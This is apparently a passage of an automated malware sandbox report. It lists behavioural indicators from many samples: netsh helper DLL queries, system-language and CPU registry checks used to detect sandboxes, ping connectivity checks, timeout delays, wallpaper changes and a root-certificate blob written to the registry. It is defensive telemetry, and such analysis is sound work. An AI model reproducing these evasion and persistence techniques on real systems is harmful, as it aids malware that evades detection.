Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Program crash 2 IoCs
pid pid_target Process procid_target 3112 1236 WerFault.exe 73 3444 4788 WerFault.exe 368 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neonn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Paraguay.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language r.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oxjuj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Boxing.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ConsoleApp2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1754010522.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PkContent.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ChatLife.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reddit.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted25.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language foggy-mountains.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language legas.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AA_v3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Paraguay.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cbmefxrmnv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Thermal.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Discord2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SteamDetector.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AnneSalt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysmablsvr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language meteran.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language neon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language F3B2.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 13 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 992 PING.EXE 2916 PING.EXE 3580 PING.EXE 4484 PING.EXE 3248 PING.EXE 3548 PING.EXE 1848 PING.EXE 2436 PING.EXE 3968 PING.EXE 744 PING.EXE 3964 PING.EXE 2136 cmd.exe 3812 PING.EXE -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 pomadachashin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz pomadachashin.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1996 timeout.exe 4060 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies Control Panel 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop 820810029.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\WallpaperStyle = "10" 820810029.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\10 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\FFlags = "1092616193" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\IPjaex13M 820810029.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\0\0 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\0 chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\IPjaex13M\DefaultIcon\ = "C:\\ProgramData\\IPjaex13M.ico" 820810029.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC}\Mode = "4" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\6 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\ComDlg\{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}\{82BA0782-5B7A-4569-B5D7-EC83085F08CC} chrome.exe Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} chrome.exe Set value (data) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 chrome.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" chrome.exe Set value (int) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" chrome.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c